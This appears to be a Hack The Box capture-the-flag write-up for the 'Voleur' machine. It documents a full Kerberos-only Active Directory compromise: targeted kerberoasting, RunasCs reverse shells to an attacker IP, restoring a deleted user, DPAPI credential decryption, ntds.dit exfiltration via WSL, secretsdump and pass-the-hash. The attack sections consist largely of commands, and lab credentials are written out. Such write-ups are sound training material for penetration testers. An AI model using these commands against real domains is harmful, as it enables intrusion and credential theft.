VOLEUR (HTB) - JA Smith

# Lessons Learned - Recheck SMB shares with every new user - When encountering errors with, e.g., SMB access, cycle through multiple tools: `smbclient`, `evil-winrm`, `smbclient.py` - If having issues pulling files from an SMB share or the like after confirming that we have access, check the inbound file perms > may need to `chmod 777 .` - Deleted users: Always be on the look out for clues associated with deleted users as they be revived - Always look for hidden files and dirs ```powershell Get-ChildItem -Path "\users\todd.wolfe" -Force tree \users\todd.wolfe\AppData\Roaming\Microsoft /f /a tree \users\todd.wolfe\AppData\Local\Microsoft /f /a ``` - Kerberos Enabled & NTLM Disabled: `NTLM:False` message and `STATUS_NOT_SUPPRTED` error when using known creds with `nxc smb` indicates we need to use Kerberos - When interacting with Kerberos, clock skew matters greatly - When interacting with Kerberos, use the `-k` with `nxc` commands - When interacting with Kerberos, use FQDN for DC - Abuse WriteSPN with `targetedkerberoating.py` - Use `kinit` to request a TGT from the KDC for a specified user - `/etc/krb5.conf` specifies the kdc and realm, so no need to include domain or DC_IP - TGTs are kept in the cache file specified in `klist`, e.g., `/tmp/krb5cc_1000` - Alternatively, we can use `impacket-getTGT` ```bash kinit username klist export KRB5CCNAME=/tmp/krb5cc_1000 #!!only do once per session!! ``` - Generate Kerberos config file ```bash nxc smb dc.voleur.htb --generate-krb5-file voleur.krb sudo cp voleur.krb /etc/krb5.conf ``` - IMPORTANT: `RunasCs.exe` is a great stand-in for `su` on Windows machines - Can also be used to generate a revshell as the substitute user ```bash .\RunasCs.exe username password powershell.exe -r kali_IP:port ``` - Always a good idea to check for DPAI master key and creds file ```powershell C:\Users\username\AppData\Roaming\Microsoft\Protect\sid\ #default user-specific master key binary loc C:\Users\username\AppData\Local\Microsoft\Credentials\ #creds blob loc C:\Users\username\AppData\Roaming\Microsoft\Credentials\ #creds blob loc ``` - Use `dpapi.py` to decrypt master key binary and reocver creds blob ```bash dpapi.py masterkey -file master_key_file_name -sid sid -password password dpapi.py credential -file creds_file_name -key decrypted_master_key ``` --- # # After-Action Attack Sequence - Kerberos Only Box - Enumerate SMB shares with given creds - Find encrypted XLSX file in IT share - Extract hash with `office2john` and crack - Here we find indications of a deleted user (`todd.wolfe`) and creds for `svc_ldap` and `svc_iis` - After running bloodhound, we find the following: - `svc_ldap` is a member of `Restore_Users` group, which may be handy to restore `todd.wolfe` - `svc_ldap` can `WriteSPN` for `svc_winrm` who is a member of `Remote Management Users` - Perform a targeted kerberoasting attack on `svc_winrm` and open a session as `svc_winrm` using `evil-winrm` - Use `RunasCs.exe` to spawn a revshell as `svc_ldap` - From here we can restore `todd.wolfe` - Use `RunasCs.exe` again to spawn a revsehll as `todd.wolfe` - Run `WinPEAS.exe` to find DPAPI master key and creds file - Exfil with `smbclient` and open with `dpapi.py` - Now we have creds for `jeremy.combs` who is a member of `Remote Management Users` - Open a session as `jeremy.combs` using `evil-winrm` - Find mysterious `id_rsa` in IT share - SSH connect as `svc_backup` using the found `id_rsa` - This drops us into WSL - Navigate to WIN fs in `/mnt/c` - Here we find a previously inaccessible `Backups` directory int he IT share that includes `ntds.dit` and the SYSTEM+SECURITY hives - Exfil with `scp` - Run `impacket-secretsdump` to extract Administrator's NT hash - PtH with `evil-winrm` to get a shell on the DC as `Administrator` --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260320204221.png]] - `nmap` scan - light > looks like a DC ![[images/Pasted image 20260320204441.png]] - `nmap` scan - detailed ![[images/Pasted image 20260320205005.png]] - Note: material clock skew - Update `/etc/hosts` --- # Port 445 (SMB) Enum ## Review given creds - Confirm access ![[images/Pasted image 20260320205755.png]]![[images/Pasted image 20260320205804.png]] - `NTLM:False` and `STATUS_NOT_SUPPRTED` indicates we need to use Kerberos - Use `faketime` and `-k` flag with `nxc` ```bash faketime "$(ntpdate -q dc.voleur.htb | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k ``` ![[images/Pasted image 20260320210818.png]] ## Password Policy ![[images/Pasted image 20260320210928.png]] ## Shares - Enum shares ![[images/Pasted image 20260320210954.png]] - Check out IT share - Running into errors with `smbclient` - Update `/etc/krb5.conf` > more errors - Fall back to using `nxc smb [...] -M spider_plus` ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k -M spider_plus ``` ![[images/Pasted image 20260320212123.png]] - Look at JSON output ![[images/Pasted image 20260320212229.png]] - Try to grab `Access_Review.xlsx` with `--get-file` > access denied ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k --get-file \\IT\\'first-line support'\\Access_Review.xlsx Access_Review.xlsx ``` ![[images/Pasted image 20260320212919.png]] - Try again with `--share` flag ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u ryan.naylor -p "HollowOct31Nyt" -k --share IT --get-file 'first-line support'\\Access_Review.xlsx Access_Review.xlsx ``` ![[images/Pasted image 20260320213334.png]] - Run `office2john` and crack associated hash with `john` > BAM! ![[images/Pasted image 20260320213559.png]] - Install `libreoffice` and open - names and three passwords ![[images/Pasted image 20260320214353.png]] - Add disclosures to `creds.txt` ## Users - Enum users ![[images/Pasted image 20260320214716.png]]![[images/Pasted image 20260320214701.png]] - Create `users.txt` ![[images/Pasted image 20260320214922.png]] --- # AD Enum ## ASREP Roasting ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc ldap dc.voleur.htb -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --asreproast out ``` ![[images/Pasted image 20260321150345.png]]![[images/Pasted image 20260321150416.png]] ## Kerberoasting ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc ldap dc.voleur.htb -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --kerberoasting out ``` ![[images/Pasted image 20260321150535.png]] ## ADCS ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" nxc ldap dc.voleur.htb -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k -M adcs ``` ![[images/Pasted image 20260321150612.png]] ## BloodHound - Run remote ingestor ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" /opt/rusthound-ce -d voleur.htb -f dc.voleur.htb -u [email protected] -p 'HollowOct31Nyt' -k -z ``` ![[images/Pasted image 20260321151118.png]] - Update `/etc/krb5.conf` ![[images/Pasted image 20260321152841.png]] - Run `klist` and `kinit` and `export KRB5CCNAME` ```bash kinit ryan.naylor klist export KRB5CCNAME=./ryan.naylor.ccache ``` ![[images/Pasted image 20260321153531.png]] - Still getting errors ![[images/Pasted image 20260321154051.png]] - Note: After looking into this later, the issue was too many arguments; instead, simply issue: ```bash rusthound-ce -d domain -u username -p password -z ``` - Try running `bloodhound-python` - This works even though the fidelity of the info will be low ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" bloodhound-python -u 'ryan.naylor' -p 'HollowOct31Nyt' -dc dc.voleur.htb -d voleur. htb -ns 10.129.7.133 -c all --zip ``` - Spin up container for bloodhound GUI ```bash cd /opt/bloodhound docker compose up -d ``` --- # AD Attack Chain Prep - run `Shortest paths from Owned objects` cypher query ![[images/Pasted image 20260321155442.png]] - `svc_iis` and `ryan.naylor` look like dead-ends > no outbound object control - also cannot resole `todd.wolfe` - `svc_ldap` has paths to `svc_winrm` and `lacey.miller` ![[images/Pasted image 20260321155228.png]] - looks like we should create an SPN for `svc_winrm` and kerberoast as `svc_ldap` so we can PtH as `svc_winrm` - once we get an interactive session on the box, let's run `sharphound` > i don't trust this as being the complete picture based on past experience with `bloodhound-python` --- # AD Attack Chain ## Lateral movement to `svc_winrm` - First, add SPN for `svc_winrm` - Getting an `invalidCredentials` error > maybe because we don't have the right krb set ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" bloodyAD --dc-ip 10.129.7.133 -d voleur.htb -u svc_ldap -p "p[assword]" set obj ect svc_winrm servicePrincipalName -v 'pwn/pwn` ``` ![[images/Pasted image 20260321162138.png]] - Try `kinit` then `export KRB4CCHAME` ```bash kinit svc_ldap klist export KRB5CCHAME=./svc_ldap.ccache ``` ![[images/Pasted image 20260321162305.png]] - Run `bloodyAD` again - Now I'm getting a `get_TGS` error ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" bloodyAD --dc-ip 10.129.7.133 -d voleur.htb -u svc_ldap -p "password" -k set object svc_winrm servicePrincipalName -v 'pwn/pwn ``` ![[images/Pasted image 20260321162409.png]] - Let's try using `impacket-getTGT` ```bash faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" impacket-getTGT voleur.htb/svc_ldap:password ``` ![[images/Pasted image 20260321162533.png]] - Now `export KRB5CCNAME` and run `targetedkerberoating.py` - This gives us the TGS hashes for `lacey.miller` and `svc_winrm` ```bash export KRB5CCHAME=./svc_ldap.ccache faketime "$(ntpdate -q 10.129.7.133 | cut -d ' ' -f 1,2)" /opt/targetedKerberoast.py -d voleur.htb -k --no-pass --dc-host dc.voleur.htb ``` ![[images/Pasted image 20260321163116.png]] - Crack type 23 hash (RC4) for `winrm_svc` - Cracked! Add to `creds.txt` ## Shell as `svc_winrm` - Reset loc for `KRB5CCNAME` to a default location ```bash export KRB5CCNAME=/tmp/krb5cc_1000 ``` - Use `kinit` to generate a ticket for `svc_winrm` ```bash kinit svc_winrm klist ``` ![[images/Pasted image 20260321190736.png]] - Connect with `evil-winrm` - Make sure to use FQDN for DC and specify realm (aka domain) - This will use the ticket for for `svc_winrm` ```bash evil-winrm -i dc.voleur.htb -r voleur.htb ``` ![[images/Pasted image 20260321190929.png]] - Light internal enum ![[images/Pasted image 20260321201223.png]]![[images/Pasted image 20260321201306.png]] - We cannot access `todd.wolfe` or HR dirs - Move `SharpHound.exe` to target and exfil the data ```powershell upload SharpHound.exe .\SharpHound.exe -c All download 20260322004120_BloodHound.zip ``` - Ingest with bloodhound - We saw that the `todd.wolfe` user was deleted - Cannot find `todd.wolfe`, but we do see that `svc_ldap` is a member of the `restore_users` group ![[images/Pasted image 20260321195550.png]] - Check Recycle Bin and for Deleted Objects ```powershell Import-Module ActiveDirectory Get-ADOptionalFeature 'Recycle Bin Feature' Get-ADObject -Filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Properties samaccountname,displayname,objectsid,whenchanged ``` ![[images/Pasted image 20260321195204.png]] - Try another way ```powershell $deletedObjects = Get-ADObject -IncludeDeletedObjects -Filter 'isDeleted -eq $true' -Properties * -ErrorAction Stop $deletedObjects | Select-Object Name, DistinguishedName, ObjectClass, whenChanged, LastKnownParent | Format-Table -AutoSize ``` ![[images/Pasted image 20260321195506.png]] ## Shell as `svc_ldap` - Move `Runas.exe` to target (new version) - [antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exe](https://github.com/antonioCoco/RunasCs) - Open revshell as `svc_ldap` ```bash .\RunasCs.exe svc_ldap password powershell.exe -r 10.10.14.197:443 ``` - Bam! ![[images/Pasted image 20260321202236.png]] - Now let's check Recycle Bin and Deleted Objects ```powershell Import-Module ActiveDirectory Get-ADOptionalFeature 'Recycle Bin Feature' Get-ADObject -Filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Properties samaccountname,displayname,objectsid,whenchanged ``` - Now we have the SID and the GUID for `todd.wolfe` ![[images/Pasted image 20260321202353.png]] - Restore `todd.wolfe` using GUID and confirm ```powershell Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db Get-ADUser todd.wolfe ``` ![[images/Pasted image 20260321202517.png]] ### Run `SharpHound` again as `svc_winrm` - We need to enum `todd.wolfe` and who can control him - Similar info to what we saw before > `Restore_Users` ![[images/Pasted image 20260321203353.png]] - `todd.wolfe` is a member of `remote management users` > maybe we can find something in his users dir - try using the password we gathered earlier with `RunasCs.exe` again ## Shell as `todd.wolfe` - Use `RunasCs.exe` from `svc_winrm` to open revshell as `todd.wolfe` ```bash .\RunasCs.exe todd.wolfe NightT1meP1dg3on14 powershell.exe -r 10.10.14.197:9443 ``` - We have a powershell session as `todd.wolfe` > back from the dead! ![[images/Pasted image 20260322151134.png]] - Show hidden dirs ```powershell Get-ChildItem -Path "C:\users\todd.wolfe" -Force ``` ![[images/Pasted image 20260322151153.png]] - Look for DPAPI goodies in: ```powershell dir \users\todd.wolfe\appdata\roaming\microsoft\credentials dir \users\todd.wolfe\appdata\local\microsoft\credentials dir \users\todd.wolfe\appdata\roaming\microsoft\protect ``` ![[images/Pasted image 20260322151954.png]] ### exfil DPAPI goodies with `evil-winrm` - Since `todd.wolfe` is in the `Remote Management Users` groups, let's open a shell via `evil-winrm` for easy download ```bash kinit todd.wolfe klist evil-winrm -i dc.voleur.htb -r voleur.htb ``` - Getting some errors ![[images/Pasted image 20260322152510.png]] - Note: After further review we could have made this work with the following command ```bash KRB5CCNAME=/temp/krb5cc_1000 evil-winrm -i dc.voleur.htb -r voleur.htb ``` ### exfil DPAPI goodies with `smbclient` - Let's try via `smbclient` ```bash smbclient -U 'voleur.htb/todd.wolfe%NightT1meP1dg3on14' --realm=voleur.htb //dc.voleur.htb/IT ``` ![[images/Pasted image 20260322154017.png]] - Get the credentials blob - having issues with `smbclient` > cannot open the local file > ends up being an outbound directory perms issue; needed to `chmod 777 .` ```bash get "Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\'772275FAD58525253490A9B0039791D3" ``` ![[images/Pasted image 20260322200323.png]] ### exfil DPAPI goodies with `smbclient.py` - Try with `smbclient.py` ```bash kinit todd.wolfe klist export KRB5CCNAME=/tmp/krb5cc_1000 faketime "$(ntpdate -q 10.129.232.130 | cut -d ' ' -f 1,2)" smbclient.py -k dc.voleur.htb ``` ![[images/Pasted image 20260322200410.png]] - Get the credentials blob ![[images/Pasted image 20260322202010.png]] - Get the master key binary![[images/Pasted image 20260322200917.png]] - Use `dpapi.py` > we have the password for `jeremy.combs` ```bash dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14 dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 ``` ![[images/Pasted image 20260322202140.png]] - `jeremy.combs` is a member of `Third-Line Technicians` and `Remote Management Users` ![[images/Pasted image 20260322202549.png]] ## Shell as `jeremy.combs` - Connect with `evil-winrm` ```bash kinit jeremy.combs klist evil-winrm -i dc.voleur.htb -r voleur.htb ``` ![[images/Pasted image 20260322202907.png]] - Look at home dir > nothing ```powershell tree . /f /a ``` ![[images/Pasted image 20260322203019.png]] - Enumerate SMB access with `nxc smb` ```bash faketime "$(ntpdate -q 10.129.232.130 | cut -d ' ' -f 1,2)" nxc smb dc.voleur.htb -u jeremy.combs -p "password" -k --shares ``` ![[images/Pasted image 20260322203450.png]] - Connect to IT share with `smbclient` ```bash smbclient -U 'voleur.htb/jeremy.combs%password' --realm=voleur.htb //dc.voleur.htb/IT ``` ![[images/Pasted image 20260322203525.png]] - We find an `id_rsa` > exfil these files ![[images/Pasted image 20260322203612.png]] ## Shell as `svc_backup` - View the note ![[images/Pasted image 20260322203650.png]] - Interesting - Windows Subsystem for Linux (WSL) is enabled - `id_rsa` must be for `svc_backup` as the XLSX we recovered earlier mentioned this account - Connect via ssh - Note: the initial `nmap` noted that port 2222 was open ```bash sudo chmod 600 id_rsa ssh -i id_rsa [email protected] -p 2222 ``` - Light internal enum ![[images/Pasted image 20260322204022.png]] - Based on the `sudo -l` output, we can immediately elevate ourselves to root - But we are stuck in WSL ![[images/Pasted image 20260322204137.png]] - With WSL, the Windows directory is located in `/mnt/c`![[images/Pasted image 20260322204227.png]] - As either `root` or `svc_backup`, we cannot access `/mnt/c/Users/Administrator` ![[images/Pasted image 20260322204509.png]] - `HR` and `Finance` shares are empty, so is `Recovery` ![[images/Pasted image 20260322204652.png]] - The IT share has a `Backups` dir that we couldn't see before within `Third-Line Support` - `ntds.dit` inside ![[images/Pasted image 20260322204856.png]] --- # Escalate to Administrator ## exfil `ntds.dit` - Grab contents (including `ntds.dit`) with `scp` since we have ssh access ```bash scp -i id_rsa -P 2222 -r "[email protected]:/mnt/c/IT/Third-Line Support/Backups" ./ ``` - Confirm that we have the necessary files ![[images/Pasted image 20260322205136.png]] - Run `impacket-secretsdump` ```bash impacket-secretsdump -ntds "Active Directory"/ntds.dit -system registry/SYSTEM -security registry.SECURITY LOCAL ``` ![[images/Pasted image 20260322205627.png]] ## PtH for Administrator - Try with `psexec.py` - Note: Not sure how to make `evil-winrm` work as we don't have the cleartext password to request a TGT with `kinit` ```bash faketime "$(ntpdate -q 10.129.232.130 | cut -d ' ' -f 1,2)" psexec.py voleur.htb/[email protected] -no-pass -hashes :nthash -k ``` - There we GO! ![[images/Pasted image 20260322205909.png]]